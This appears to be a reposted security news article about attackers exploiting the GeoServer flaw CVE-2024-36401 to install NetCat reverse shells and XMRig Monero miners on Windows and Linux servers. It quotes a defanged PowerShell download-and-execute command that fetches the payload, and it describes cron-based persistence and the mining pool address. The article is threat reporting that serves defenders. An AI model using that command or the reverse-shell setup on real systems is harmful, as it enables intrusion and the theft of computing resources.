By rssfeeds-admin .webp?ssl=1 "Hackers Exploiting GeoServer RCE Vulnerability to Deploy CoinMiner")
The vulnerability, designated CVE-2024-36401, affects the popular open-source Geographic Information System server written in Java, which provides essential platforms for spatial data processing in numerous organizations worldwide.
Since the vulnerability’s disclosure in 2024, threat actors have aggressively exploited unpatched GeoServer installations to execute malicious code remotely.
The attacks have escalated significantly, with cybercriminals systematically scanning for vulnerable servers and deploying sophisticated malware payloads that include both remote access tools and cryptocurrency miners.
The malware campaign demonstrates remarkable persistence and technical sophistication, targeting both Windows and Linux environments running vulnerable GeoServer installations.
ASEC analysts identified multiple attack instances in South Korea, where threat actors successfully compromised Windows-based GeoServer deployments that had not applied the necessary security patches for CVE-2024-36401.
The attack methodology reveals a multi-stage infection process that begins with remote code execution through PowerShell commands.
In documented cases, attackers executed malicious PowerShell scripts to download and install NetCat, a network utility that functions as a reverse shell, providing persistent remote access to compromised systems.
The NetCat installation occurs through the “-e” argument, establishing connections to command and control servers that enable continuous system manipulation.
Cryptocurrency Mining Deployment and Persistence Mechanisms
The primary objective of these attacks centers on deploying XMRig, a Monero cryptocurrency miner that hijacks system resources for illicit mining operations. The threat actors demonstrate platform-aware tactics, utilizing PowerShell scripts for Windows environments and Bash scripts for Linux systems.
The Windows variant executes the command IEX(New-ObjectNet.WebClient).DownloadString('hxxp://182.218.82.[1]4/js/1/gw.txt') to retrieve and install XMRig components.
Here’s the PowerShell script installation process and the corresponding Bash script methodology for Linux systems.
The Linux variant includes additional persistence mechanisms through Cron job registration, ensuring the malware maintains operational continuity even after system reboots. These Cron jobs execute scripts downloaded from Pastebin, creating multiple layers of persistence that complicate removal efforts.
The mining operations connect to pool.supportxmr.com:443, generating Monero cryptocurrency directly into attacker-controlled wallets while simultaneously degrading system performance and increasing operational costs for victims.
Investigate live malware behavior, trace every step of an attack, and make faster, smarter security decisions -> Try ANY.RUN now
The post Hackers Exploiting GeoServer RCE Vulnerability to Deploy CoinMiner appeared first on Cyber Security News.
Discover more from RSS Feeds Cloud
Subscribe to get the latest posts sent to your email.